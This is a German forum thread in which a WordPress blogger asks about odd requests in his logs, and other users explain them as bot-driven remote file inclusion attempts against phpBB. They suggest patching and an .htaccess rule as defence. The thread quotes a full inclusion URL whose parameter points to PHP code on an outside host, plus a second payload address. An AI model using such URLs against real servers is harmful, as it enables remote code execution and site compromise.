Merkwürdiger URL-Aufruf

  • Hallo zusammen!

    Durch das Plugin Cystats bin ich auf einen komischen URL-Aufruf aufmerksam geworden und wollte die Spezialisten mal um Aufklärung bitten. Versucht hier jemand Code einzuschleusen?

    URL: http://www.graubrot.net/language/lang_…gallery/on.txt?

    Wenn man dem Link folgt, landet man auf ner 404 Seite in meinem Blog. Der Aufruf verursacht in meinem CHCounter folgende Fehlermeldung, die man auf der 404 Seite auch sehen kann:

    Zitat

    Warning: parse_url(/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.pinkandblackmedia.com/gallery/on.txt?) [function.parse-url]: Unable to parse URL in /www/htdocs/xxxxxxxxx/blog/counter/counter.php

    Folgt man dem pinkandblackmedia Link, so landet man in einer Textdatei die PHP Code enthält, mit dem ich nicht wirklich was anfangen kann. Vielleicht kann mir jemand erklären,was hier versucht wurde zu machen?!

    PS: Gleiches Spiel bei folgendem Link: http://www.pucorp.t5.com.br/id2.txt

    Einmal editiert, zuletzt von mfitzen (12. März 2008 um 08:46)

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • das ist recht simpel....

    es wurde versucht schadcode auf deinen server zu schleusen und zur ausführung zu bringen.

    evtl. um datenbank-inhalte auszulesen oder ähnliches. um das sagen zu können, müsste man den inhalt der textdatei, die du erwähntest, kennen.

    als angriffsstelle wird wohl die einbindung eines phpbb-boards auf deiner site genutzt.

    da die aufgerufene url aber augenscheinlich nicht sauber ist, ist es - bei dem entsprechenden aufruf - bei dem versuch geblieben.

    du solltest dich mal bei dem entwickler der schnittstelle zu phpbb in verbindung setzen, welche auswirkungen ein solcher versuch haben kann, wenn er erfolgreich ist. evtl. hat er sogar bereits eine lösung um erfolgreichere versuche dieses url-abgriffes zu unterbinden.

    vG

    Arno

    Feedback ist Wichtig!|FAQ|Rückfragen im Forum!|Wenn ich mal was vergesse.... einfach mal sagen...

  • das ist recht simpel....

    es wurde versucht schadcode auf deinen server zu schleusen und zur ausführung zu bringen.

    OK... wenn man augen im kopf hätte, hätte man den link auf die textdatei gesehen...

    bei dieser werden, wie ich das sehe, wohl nur ein paar ausgaben gemacht. auf dem gleichen weg lassen sich aber ganz andere routinen einschleusen, welche letztlich das machen können, auf das ich ansprach.

    vG

    Arno

    Feedback ist Wichtig!|FAQ|Rückfragen im Forum!|Wenn ich mal was vergesse.... einfach mal sagen...

  • als angriffsstelle wird wohl die einbindung eines phpbb-boards auf deiner site genutzt.

    da die aufgerufene url aber augenscheinlich nicht sauber ist, ist es - bei dem entsprechenden aufruf - bei dem versuch geblieben.


    Vermutlich betreibt der Beitragsersteller kein phpBB-Forum. Solche Einträge finde ich ab und zu auch in meinen Log-Dateien. Manchmal werden auch Versuche unternommen, Lücken von Joomla und anderen CMS auszunutzen. Aber auch das scheitert, weil nichts davon auf meinem Server läuft.
    Hinter den Versuchen stecken bloß Bots, die ohne Intelligenz irgendwelche Verzeichnisse und Dateien aufrufen.

    Zitat

    evtl. hat er sogar bereits eine lösung um erfolgreichere versuche dieses url-abgriffes zu unterbinden.

    Grundsätzlich muss man das selbe machen wie bei WordPress: die eingesetzte Software (phpBB, WAMP, Joomla, usw.) aktuell halten und Sicherheitspatches sofort einspielen.

    Um die o.g. Anfragen zu blocken, reicht aber auch die ".htaccess". Was ist wohl das gemeinsame Merkmal von allen Angriffen dieser Art? Es wird versucht, eine Datei auf einem externen Server zu laden. Folglich kommt im QUERY_STRING immer ein "http" vor. Und wenn du das mit einer Regel prüfst und die Anfrage dann in eine leere Textdatei umleitest, dann sparst du Traffic und Nerven. ;)

  • Hallo und vielen Dank für die schnellen Antworten!

    In der Tat benutze ich kein PHPBB! Auf dieser Domain läuft nur WP. Solche Aufrufe sind mir in den letzten Wochen häufiger aufgefallen, jedoch waren es mal ein oder zwei in der Woche. Als ich heute morgen geschaut habe, standen bestimmt 15 oder 20 solcher Aufrufe in den Stats. Naja, solange die immer ins Leere laufen, soll´s mir ja egal sein.

    Auf der anderen Seite passt sowas auch wieder ins Bild. Erst gestern war meine Site für Stunden nicht erreichbar. Es gab ständig nen weissen Bildschirm. Beim Aufruf des Adminbereichs wurden mir die PHP Dateien immer zum Download angeboten. Ich habe vermutet, dass seitens des Hosters am Server gearbeitet wurde, was dann (meiner Meinung nach) aber auch irgendwie nicht sein konnte, da auf dem gleichen Server 2 weitere Domains von mir laufen, die problemlos erreichbar waren. Am Abend lief dann auf einmal wieder alles...

    Ich werd´s mal im Auge behalten. Danke nochmals für die Infos! ;-)

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!